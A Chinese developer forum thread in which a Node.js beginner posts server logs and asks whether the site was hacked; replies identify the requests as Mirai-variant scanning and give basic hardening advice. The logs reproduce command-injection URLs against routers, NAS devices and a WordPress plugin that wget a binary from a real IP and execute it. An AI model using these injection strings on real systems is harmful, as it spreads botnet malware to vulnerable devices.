Nodejs 新手求帮忙看看 web 后台 控制台输出这些 是不是被人黑了

Nodejs 新手求帮忙看看 web 后台 控制台输出这些 是不是被人黑了
网站后台空闲会输出这些 进了这些 IP 看了 里面都是像文件列表一样的

debug: Requested :: GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20http://178.128.11.199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
debug: Requested :: GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20dlink%27$
debug: Requested :: GET /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo&devname=|ping%20-n%200%20localhost&rand=1452765315144;wget%20http://178.128.11.199/qtx.mips%20-O%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20exploit
debug: Requested :: GET /maker/snwrite.cgi?mac=1234;wget%20http://178.128.11.199/qtx.mips%20-O%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20exploit
debug: Requested :: GET /wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://localhost/1.jpg$(wget$20http://178.128.11.199/qtx.mips%20-O%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz)


3 回复

只是试图让你机器帮忙挖矿而已


这是一个 Mirai 僵尸网络变种叫 Masuta,最近比较活跃,使用 5 个漏洞传播(都是针对 IoT 设备的),只有一个是针对 Wordpress 的,你的网站如果用了 Wordpress 自查一下这个漏洞( https://www.exploit-db.com/exploits/39250/)就好了,不是 Wordpress 的话更不用担心

作为IT技术人员,理解你对Node.js后台安全的担忧。首先,控制台输出异常信息并不一定意味着你的服务器被黑了,但确实值得仔细检查。以下是一些基本步骤和示例代码,帮助你排查问题:

  1. 检查日志: 查看Node.js应用的日志文件,特别是错误和异常日志。使用console.log或更高级的日志库(如winston)来记录关键操作和异常。

    const winston = require('winston');
const logger = winston.createLogger({
  level: 'info',
  format: winston.format.json(),
  transports: [
    new winston.transports.File({ filename: 'error.log', level: 'error' }),
    new winston.transports.Console()
  ],
});

try {
  // 你的代码
} catch (error) {
  logger.error('Error occurred:', error);
}

  2. 监控请求: 使用中间件(如express-rate-limit)来监控和限制请求,防止恶意攻击。

    const rateLimit = require('express-rate-limit');
const limiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15分钟窗口
  max: 100, // 限制每个IP最多100请求
});

app.use(limiter);

  3. 安全审计: 检查代码库和依赖项是否有已知的安全漏洞。使用工具如npm audit来扫描依赖项。

    npm audit

  4. 网络监控: 使用网络监控工具检查是否有异常流量或未经授权的访问尝试。

如果控制台输出包含敏感信息或明确的攻击迹象(如SQL注入尝试),请立即采取行动,包括但不限于隔离服务器、更新密码和密钥、以及联系安全专家。

回到顶部